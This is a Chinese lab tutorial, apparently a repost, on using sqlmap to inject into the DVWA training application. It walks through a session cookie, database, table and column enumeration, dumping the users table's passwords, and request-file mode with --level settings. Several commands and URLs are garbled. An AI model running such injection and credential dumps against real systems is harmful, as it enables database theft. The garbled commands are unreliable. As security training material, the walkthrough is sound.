使用sqlmap對dvwa進行自動化注入
設定dvwa等級為low
#開啟dvwa的SQL Injection(SQL Injection (Blind) ),開啟瀏覽器偵錯,輸入user id並submit,以查看攔截到的請求。
可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」
我們直接放到salmap測試一下,用-u指令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "
可以看到這裡是需要登入的,否則跑不出來。所以我們需要加入一個cookie維持登入
6.使用burp suite代理程式抓包,取得登入的cookie,新增--dbs 爆資料 -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low"#mycoo
## 7. 我們使用-D xxx指定檢視的資料庫,用--tables檢視該資料庫的所有表格:-u "http://192.168.1.222:8089/vul "http://192.168.1.222:8089/vulultiabilities/i/mitid Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables查看跑出來的結果:#8.我們用-D xxx -T ttt指定檢視的表,用--columns查看表的列-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns9.我們用-D xxx查看資料庫, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的資料-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu666rtp07 -D dvwa -T users -C password,user --dump
返回的網址
# 將抓取的封包儲存為.txt文件,放入sqlmap的目錄下,爆炸資料庫,指令: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -- sql level 2 --dbs
爆炸表名
##-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
爆列名
level :Sqlmap一共有5個探測等級,預設是1。等級越高,表示偵測時使用的payload也越多。其中5級的payload最多,會自動破解出cookie、XFF等頭部注入。當然,等級越高,偵測的時間也越慢。這個參數會影響測試的注入點,GET和POST的資料都會進行測試,HTTP cookie在level為2時就會測試,HTTP User-Agent/Referer頭在level為3時就會測試。在不確定哪個參數為注入點時,為了確保準確性,建議設定level為5(速度也隨之變慢)
以上是Sqlmap自動化注入的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!